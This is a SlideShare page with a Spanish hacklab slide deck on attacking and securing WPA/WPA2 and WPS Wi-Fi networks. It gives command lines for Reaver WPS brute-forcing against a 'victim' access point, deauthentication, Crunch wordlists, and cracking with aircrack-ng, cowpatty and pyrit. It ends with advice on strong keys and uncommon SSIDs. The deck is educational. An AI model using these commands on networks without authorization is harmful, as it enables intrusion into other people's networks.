SlideShare una empresa de Scribd logo
Seguridad en redes wireless II
L'Hacklab
11052013
L'Hacklab
Kali Linux
WPA/WPA2
● Uso doméstico: WPA-PSK (Wireless Protected Access
Pre-Shared Key)
● Uso empresarial: Radius, cifrados...
WPA2 es la segunda generación de WPA. La principal diferencia entre WPA
original y WPA2 es que la segunda necesita el Estándar avanzado de cifrado
(AES) para el cifrado de los datos, mientras que WPA original emplea TKIP (claves
temporales).
Un paseo por la historia
WPS (Wi-Fi Protected Setup)
Es un estándar promovido por la Wi-Fi Alliance para la creación de
redes WLAN seguras. Se trata de la definición de diversos
mecanismos para facilitar la configuración de una red WLAN
segura con WPA2, pensados para minimizar la intervención del
usuario en entornos domésticos o pequeñas oficinas.
Concretamente, WPS define los mecanismos a través de los cuales
los diferentes dispositivos de la red obtienen las credenciales (SSID
y PSK) necesarias para iniciar el proceso de autenticación.
WPS permite la conexion a cualquier elemento de nuestra red
mediante un PIN interno de nuestro router.
Reaver
● airodump-ng mon0 -w wps-test –beacons –channel c –bssid <bssid>
● reaver -i mon0 -b mac victima -c canal de la victima -e ssid de la victima (nombre red) -d 12 -vv
Crackeo de clave WPA/WPA2 PSK
En el modo WPA/WPA2 PSK la clave PMK de la cual se deriva luego la PTK se obtiene con
la siguiente función:
PMK = PBKDF2(PSK, SSID, longitud SSID, 4096, 256)
Donde PBKDF2 es una función de derivación de claves que forma parte de los estándares
criptográficos de clave pública de los laboratorios RSA (PKCS). Se trata de una función
pseudoaleatoria que se utiliza para derivar la clave (PMK) haciendo uso de la frase PSK y
SSID.
● HASH ATTACK
– El problema radica en que los hashes precalculados dependen del SSID de la red, con
lo que no es posible tener precalculados todos los hashes para todos los posibles
nombres de red.
Aircrack
Para obtener el intercambio de números aleatorios entre
un equipo y el punto de acceso se lanza un ataque de
desasociación de modo que se desconecte el equipo
obligándolo a conectar de nuevo.
● aireplay-ng
– Attack 0: Deauthentication
Fuerza Bruta
¿Creo mi diccionario o lo descargo?
Creando un diccionario
● Crunch
crunch <min-len> <max-len> [-f <path to charset.lst> charset-name] [-o wordlist.txt] [-t [FIXED]@@@@] [-
s startblock] [-c number]
– Charset.lst o personalizado
– -o genera diccionario
– -t variar parte de las claves -t 1@3456@@
ejemplo:
crunch 8 16 01234567890 -o dicc.txt
Diccionario al vuelo
● Con aircrack-ng
./crunch 8 8 -f charset.lst numeric | ./aircrack-ng -a 2 micaptura.cap -e ESSID -b MAC-AP -w -
Uso de diccionarios
● Aircrack-ng
– aircrack-ng <archivodecaptura.cap> -w<diccionario>
● CoWPAtty
– cowpatty -f <diccionario> -s <ESSIDdelAP> -r <archivodecaptura.cap>
● Pyrit
– pyrit -r <archivodecaptura.cap> -i <diccionario> -b <BSSIDdelAP> attack_passthrough
CUDA de NVIDIA
Elcomsoft ha desarrollado algoritmos de crackeo de contraseñas de diversos
sistemas utilizando la tecnología CUDA de NVIDIA, de modo que fuera posible
aprovechar la(s) GPU(s) de las tarjetas gráficas. CUDA solo tiene soporte para
las tarjetas de la serie 8000 y 9000.
Su aplicación “Distributed Password Recovery” proporciona aceleración
mediante esta tecnología para el crackeo de:
● Microsoft Word/Excel/PowerPoint/Project 2007 (docx,xlsx,pptx,mspx)
● Windows NT/2000/XP/2003/Vista logon passwords (LM/NTLM)
● MD5 hashes
● WPA and WPA2 passwords
Tablas Pre-Calculadas
Renderlab es posible obtener hasta 33 GB de hashes precalculados, generado a partir de un
diccionario (en inglés) y listado de SSID.
cowpatty -d <rainbowtable> -r <archivodecaptura.cap> -s <ESSIDdelAP> -2
Conclusiones
El uso de WPA/WPA2-PSK es una solución adecuada en un entorno
doméstico siempre y cuando se utilice una clave segura.
La seguridad no depende de la cantidad de tráfico que circule por la
red, sino de la posibilidad de obtener la clave de cifrado a partir de los
paquetes donde se produce la autenticación del usuario.
Para evitar que el craqueo de la clave PSK hay que evitar claves que
se encuentren en diccionarios, claves de poca longitud de caracteres y
de poca complejidad. Para evitar que puedan utilizar tablas pre-
calculadas hay que evitar los nombres SSID simples o comunes, del
tipo “Home”, “Personal”, "Wifi", “Default”, “Wireless”, “Net”, etc…
Esta infraestructura no ofrece ninguna protección contra atacantes
internos.
Otros ataques
● AP Rogue (MITM)
– Airbase-ng u otros sistemas más complejos
POC
Configurar Interfaz de red
● Listar interfaces inalámbricos
– iwconfig <interfaz> [down/up]
● Modo Monitor
– airmon-ng start <interfaz>
● Test de injección
– aireplay-ng -9 <interfaz>
POC: WEP/WPA
● AP1
● AP2
GRACIAS POR VENIR
● Twitter : @lhacklab
● Facebook: Lhacklab
● Blog: www.l-hacklab.org
● E-mail: info@l-hacklab.org
L'HackLabL'HackLab

Más contenido relacionado

PPTX
Auditoría wireless
PPTX
M2 com practico_arodri
PPTX
Protocolos de cifrado.
PPTX
Leonardo Nve - Explotando cambios en servidores DNS [RootedSatellite Valencia]
PDF
dmz definicion
PDF
Seguridad Entornos Web Open Source
PDF
Seguridad en Windows Mobile
PPTX
Configuracion de parametros para el establecimiento de la seguridad y protecc...
Auditoría wireless
M2 com practico_arodri
Protocolos de cifrado.
Leonardo Nve - Explotando cambios en servidores DNS [RootedSatellite Valencia]
dmz definicion
Seguridad Entornos Web Open Source
Seguridad en Windows Mobile
Configuracion de parametros para el establecimiento de la seguridad y protecc...

La actualidad más candente (20)

DOC
Esquema de Red con DMZ
PPTX
Seguridad 1 - Redes de Computadoras
DOC
Encriptacion[1]
PPTX
Seguridad 2 - Redes de Computadoras
PPTX
Seguridad 3 - Redes de Computadoras
PDF
Controles de acceso iniciales
PPTX
Protocolo De Seguridad Y De Red
DOCX
Luiyiana lab2
PDF
Configuración manual con DHCP de redes WLAN protegidas con WPA y WPA2 en Debi...
PPTX
Protocolos de seguridad informática
PDF
Hardening de Servidores Linux Oscar Gonzalez
PDF
Workshop Seguridad Wireless
PPTX
Protocolos de cifrado
PDF
Seguridad en Redes Inalámbricas
PPTX
Vins Villaplana - Seguridad en capa de enlace [RootedCON 2011]
DOCX
Protocolos De Seguridad En Redes
PDF
Vc4 nm73 eq#6-tls
PDF
Ug firewall & dmz
PDF
Vc4 nm73 eq#6-dsa
Esquema de Red con DMZ
Seguridad 1 - Redes de Computadoras
Encriptacion[1]
Seguridad 2 - Redes de Computadoras
Seguridad 3 - Redes de Computadoras
Controles de acceso iniciales
Protocolo De Seguridad Y De Red
Luiyiana lab2
Configuración manual con DHCP de redes WLAN protegidas con WPA y WPA2 en Debi...
Protocolos de seguridad informática
Hardening de Servidores Linux Oscar Gonzalez
Workshop Seguridad Wireless
Protocolos de cifrado
Seguridad en Redes Inalámbricas
Vins Villaplana - Seguridad en capa de enlace [RootedCON 2011]
Protocolos De Seguridad En Redes
Vc4 nm73 eq#6-tls
Ug firewall & dmz
Vc4 nm73 eq#6-dsa
Publicidad

Destacado (20)

PDF
Manual de hacker 131 trucos elhacker hacking webs, hack msn messenger 7, se...
PDF
Backtrack 5 claves wpa y wpa2 pirate night
PPT
REDES...XD!
PPT
Redinalambricas
PPT
Inseguridad Redes Inalambricas
PPT
Introducción a la seguridad en redes inalámbricas
PPTX
Taller 01 teoria
PPT
Nueva Generación de Redes Wi-Fi Parte II
PPTX
Seg wifi pre
PPTX
Presentacion power point lan inalambrica
PDF
Curso Gratis Redes InaláMbricas
PDF
05 introduccion a-las_redes_wi_fi-es-v2.3
PPT
Seguridad Wifi
PPTX
Seguridad de la información
PPTX
Normas de Seguridad de la Información
PPTX
Redes inalambricas
PPTX
Tecnicas avanzadas de penetracion a sistemas
PPT
Manual para romper contraseñas WEP y WPA
PPTX
Seguridad fisica y logica
Manual de hacker 131 trucos elhacker hacking webs, hack msn messenger 7, se...
Backtrack 5 claves wpa y wpa2 pirate night
REDES...XD!
Redinalambricas
Inseguridad Redes Inalambricas
Introducción a la seguridad en redes inalámbricas
Taller 01 teoria
Nueva Generación de Redes Wi-Fi Parte II
Seg wifi pre
Presentacion power point lan inalambrica
Curso Gratis Redes InaláMbricas
05 introduccion a-las_redes_wi_fi-es-v2.3
Seguridad Wifi
Seguridad de la información
Normas de Seguridad de la Información
Redes inalambricas
Tecnicas avanzadas de penetracion a sistemas
Manual para romper contraseñas WEP y WPA
Seguridad fisica y logica
Publicidad

Similar a Redeswifi ii (20)

PPTX
Proyecto de aula
PDF
Crackeando redes wep
PDF
Seguridad wifi
ODP
Taller SITEC 2010
PDF
Seguridad de redes wifi 802
DOCX
Crak wep
DOCX
Se puede subir
DOCX
Crack WEP
PPS
WEP and WPA exposed
PDF
Juan
ODP
Seguridad en redes WiFi
PPT
D-Link: Seguridad Wifi
PPT
Hacking wireless by Alberto García
PDF
Propietario
PDF
Webinar Gratuito: Atacar Redes WPA con Kali Linux
PPTX
PROTOCOLO DE CIFRADO
PDF
Seguridad de redes inalámbricas - 2007
PPT
Viviendo En La Jungla
PPS
Redes WiFi. Problemas y Soluciones.
ODP
Redeswifi i
Proyecto de aula
Crackeando redes wep
Seguridad wifi
Taller SITEC 2010
Seguridad de redes wifi 802
Crak wep
Se puede subir
Crack WEP
WEP and WPA exposed
Juan
Seguridad en redes WiFi
D-Link: Seguridad Wifi
Hacking wireless by Alberto García
Propietario
Webinar Gratuito: Atacar Redes WPA con Kali Linux
PROTOCOLO DE CIFRADO
Seguridad de redes inalámbricas - 2007
Viviendo En La Jungla
Redes WiFi. Problemas y Soluciones.
Redeswifi i

Redeswifi ii

  • 1. Seguridad en redes wireless II L'Hacklab 11052013 L'Hacklab
  • 3. WPA/WPA2 ● Uso doméstico: WPA-PSK (Wireless Protected Access Pre-Shared Key) ● Uso empresarial: Radius, cifrados... WPA2 es la segunda generación de WPA. La principal diferencia entre WPA original y WPA2 es que la segunda necesita el Estándar avanzado de cifrado (AES) para el cifrado de los datos, mientras que WPA original emplea TKIP (claves temporales).
  • 4. Un paseo por la historia
  • 5. WPS (Wi-Fi Protected Setup) Es un estándar promovido por la Wi-Fi Alliance para la creación de redes WLAN seguras. Se trata de la definición de diversos mecanismos para facilitar la configuración de una red WLAN segura con WPA2, pensados para minimizar la intervención del usuario en entornos domésticos o pequeñas oficinas. Concretamente, WPS define los mecanismos a través de los cuales los diferentes dispositivos de la red obtienen las credenciales (SSID y PSK) necesarias para iniciar el proceso de autenticación. WPS permite la conexion a cualquier elemento de nuestra red mediante un PIN interno de nuestro router.
  • 6. Reaver ● airodump-ng mon0 -w wps-test –beacons –channel c –bssid <bssid> ● reaver -i mon0 -b mac victima -c canal de la victima -e ssid de la victima (nombre red) -d 12 -vv
  • 7. Crackeo de clave WPA/WPA2 PSK En el modo WPA/WPA2 PSK la clave PMK de la cual se deriva luego la PTK se obtiene con la siguiente función: PMK = PBKDF2(PSK, SSID, longitud SSID, 4096, 256) Donde PBKDF2 es una función de derivación de claves que forma parte de los estándares criptográficos de clave pública de los laboratorios RSA (PKCS). Se trata de una función pseudoaleatoria que se utiliza para derivar la clave (PMK) haciendo uso de la frase PSK y SSID. ● HASH ATTACK – El problema radica en que los hashes precalculados dependen del SSID de la red, con lo que no es posible tener precalculados todos los hashes para todos los posibles nombres de red.
  • 8. Aircrack Para obtener el intercambio de números aleatorios entre un equipo y el punto de acceso se lanza un ataque de desasociación de modo que se desconecte el equipo obligándolo a conectar de nuevo. ● aireplay-ng – Attack 0: Deauthentication
  • 10. ¿Creo mi diccionario o lo descargo?
  • 11. Creando un diccionario ● Crunch crunch <min-len> <max-len> [-f <path to charset.lst> charset-name] [-o wordlist.txt] [-t [FIXED]@@@@] [- s startblock] [-c number] – Charset.lst o personalizado – -o genera diccionario – -t variar parte de las claves -t 1@3456@@ ejemplo: crunch 8 16 01234567890 -o dicc.txt
  • 12. Diccionario al vuelo ● Con aircrack-ng ./crunch 8 8 -f charset.lst numeric | ./aircrack-ng -a 2 micaptura.cap -e ESSID -b MAC-AP -w -
  • 13. Uso de diccionarios ● Aircrack-ng – aircrack-ng <archivodecaptura.cap> -w<diccionario> ● CoWPAtty – cowpatty -f <diccionario> -s <ESSIDdelAP> -r <archivodecaptura.cap> ● Pyrit – pyrit -r <archivodecaptura.cap> -i <diccionario> -b <BSSIDdelAP> attack_passthrough
  • 14. CUDA de NVIDIA Elcomsoft ha desarrollado algoritmos de crackeo de contraseñas de diversos sistemas utilizando la tecnología CUDA de NVIDIA, de modo que fuera posible aprovechar la(s) GPU(s) de las tarjetas gráficas. CUDA solo tiene soporte para las tarjetas de la serie 8000 y 9000. Su aplicación “Distributed Password Recovery” proporciona aceleración mediante esta tecnología para el crackeo de: ● Microsoft Word/Excel/PowerPoint/Project 2007 (docx,xlsx,pptx,mspx) ● Windows NT/2000/XP/2003/Vista logon passwords (LM/NTLM) ● MD5 hashes ● WPA and WPA2 passwords
  • 15. Tablas Pre-Calculadas Renderlab es posible obtener hasta 33 GB de hashes precalculados, generado a partir de un diccionario (en inglés) y listado de SSID. cowpatty -d <rainbowtable> -r <archivodecaptura.cap> -s <ESSIDdelAP> -2
  • 16. Conclusiones El uso de WPA/WPA2-PSK es una solución adecuada en un entorno doméstico siempre y cuando se utilice una clave segura. La seguridad no depende de la cantidad de tráfico que circule por la red, sino de la posibilidad de obtener la clave de cifrado a partir de los paquetes donde se produce la autenticación del usuario. Para evitar que el craqueo de la clave PSK hay que evitar claves que se encuentren en diccionarios, claves de poca longitud de caracteres y de poca complejidad. Para evitar que puedan utilizar tablas pre- calculadas hay que evitar los nombres SSID simples o comunes, del tipo “Home”, “Personal”, "Wifi", “Default”, “Wireless”, “Net”, etc… Esta infraestructura no ofrece ninguna protección contra atacantes internos.
  • 17. Otros ataques ● AP Rogue (MITM) – Airbase-ng u otros sistemas más complejos
  • 18. POC
  • 19. Configurar Interfaz de red ● Listar interfaces inalámbricos – iwconfig <interfaz> [down/up] ● Modo Monitor – airmon-ng start <interfaz> ● Test de injección – aireplay-ng -9 <interfaz>
  • 21. GRACIAS POR VENIR ● Twitter : @lhacklab ● Facebook: Lhacklab ● Blog: www.l-hacklab.org ● E-mail: info@l-hacklab.org L'HackLabL'HackLab